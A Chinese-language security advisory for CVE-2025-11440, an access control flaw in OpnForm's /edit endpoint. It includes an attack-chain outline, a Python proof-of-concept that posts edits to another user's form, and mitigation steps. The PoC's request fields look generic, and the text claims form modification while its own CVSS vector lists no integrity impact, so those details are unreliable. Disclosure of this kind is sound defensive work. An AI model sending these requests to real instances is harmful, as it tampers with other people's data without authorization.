CVE-2025-11440：JhumanJ OpnForm /edit 接口访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2025-11440

漏洞类型

访问控制不当（Improper Access Controls）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JhumanJ OpnForm

漏洞概述

CVE-2025-11440 是 JhumanJ OpnForm 开源表单管理工具中的一个访问控制不当漏洞，影响版本至 1.9.3（含）。该漏洞存在于应用程序的 /edit 端点中，攻击者可以通过远程方式利用此漏洞绕过正常的权限校验机制，导致未经授权的访问或修改操作。

根据 CVSS 3.1 评分体系，该漏洞评分为 4.3 分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。漏洞对机密性产生低影响（C:L），对完整性和可用性无影响（I:N/A:N），表明该漏洞主要用于信息泄露或受限数据的未授权读取。

该漏洞已被公开披露，相关的概念验证（PoC）信息已在公开渠道流传，因此存在被恶意利用的风险。JhumanJ 官方已通过提交 b15e29021d326be127193a5dbbd528c4e37e6324 提供了修复补丁，建议所有受影响用户尽快升级以修复此问题。OpnForm 作为一款广泛使用的开源在线表单构建工具，被许多企业和组织用于收集和管理数据，因此该漏洞可能对使用该平台的组织的数据安全构成潜在威胁。

技术细节

该漏洞位于 JhumanJ OpnForm 的 /edit 路由处理逻辑中。具体而言，当用户通过 HTTP 请求访问 /edit 端点时，应用程序未能充分验证请求者的身份和权限，导致存在权限绕过的问题。

从技术层面分析，漏洞的根本原因在于访问控制机制的不完善。在正常的权限校验流程中，应用程序应当验证当前用户是否为对应表单的所有者或具有足够的操作权限。然而，由于 /edit 端点在处理编辑请求时缺少适当的授权检查（Authorization Check），或者权限验证逻辑存在缺陷，攻击者可以在拥有低权限账号（如普通用户）的情况下，通过构造特定的请求来访问或修改不属于自己的表单数据。

利用方式方面，攻击者首先需要拥有一个有效的低权限账户（PR:L），然后通过网络向目标 OpnForm 实例的 /edit 端点发送精心构造的 HTTP 请求。请求中可以包含目标表单的标识符（如表单 ID），由于服务端缺少对该用户是否拥有目标表单编辑权限的验证，攻击者能够成功执行编辑操作或读取受限的表单内容。

该漏洞的修复通过提交 b15e29021d326be127193a5dbbd528c4e37e6324 完成，该补丁主要增强了 /edit 端点的权限校验逻辑，确保只有具有相应权限的用户才能执行编辑操作。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者首先获取一个有效的 OpnForm 普通用户账户，可以通过注册新账户或获取泄露的凭据实现。

STEP 2

步骤2：身份认证

使用低权限账户登录 OpnForm 平台，获取有效的会话 Cookie 或认证令牌。

STEP 3

步骤3：探测目标表单

通过浏览公开表单或猜测表单 ID，识别可利用的目标表单资源。

STEP 4

步骤4：构造恶意请求

向 /edit 端点发送包含目标表单 ID 的编辑请求，利用服务端缺少的权限校验逻辑。

STEP 5

步骤5：绕过访问控制

服务端未能验证当前用户是否为表单所有者，直接处理编辑请求，导致未授权访问或修改。

STEP 6

步骤6：数据泄露或篡改

攻击者成功读取或修改不属于自己的表单数据，造成信息泄露或数据完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11440 - JhumanJ OpnForm Improper Access Controls PoC
# Vulnerability: Improper Access Controls in /edit endpoint
# Affected: JhumanJ OpnForm <= 1.9.3

import requests

TARGET_URL = "http://target-opnform-instance.com"
SESSION_COOKIE = "your_session_cookie_here"
FORM_ID = "target_form_id"

# Step 1: Authenticate with low-privilege credentials
session = requests.Session()
session.cookies.set("session", SESSION_COOKIE)

# Step 2: Attempt to access /edit endpoint without proper authorization
# The server fails to verify if the user owns the target form
edit_url = f"{TARGET_URL}/edit"

# Step 3: Send the crafted request to bypass access control
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"{TARGET_URL}/forms"
}

# Payload to access/edit a form that the user does not own
payload = {
    "form_id": FORM_ID,
    "title": "Modified by unauthorized user",
    "description": "Access control bypassed via CVE-2025-11440"
}

response = session.post(edit_url, data=payload, headers=headers)

if response.status_code == 200:
    print("[+] Access control bypassed successfully!")
    print(f"[+] Response: {response.text[:500]}")
else:
    print(f"[-] Request failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text[:500]}")

影响范围

JhumanJ OpnForm <= 1.9.3

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在 Web 服务器或反向代理层面限制 /edit 端点的访问，仅允许可信 IP 访问；2）监控 /edit 端点的异常访问行为，设置告警规则；3）审查并限制现有用户的权限，确保普通用户无法访问敏感表单；4）检查应用日志，排查是否存在已被利用的痕迹；5）尽快应用官方补丁完成修复。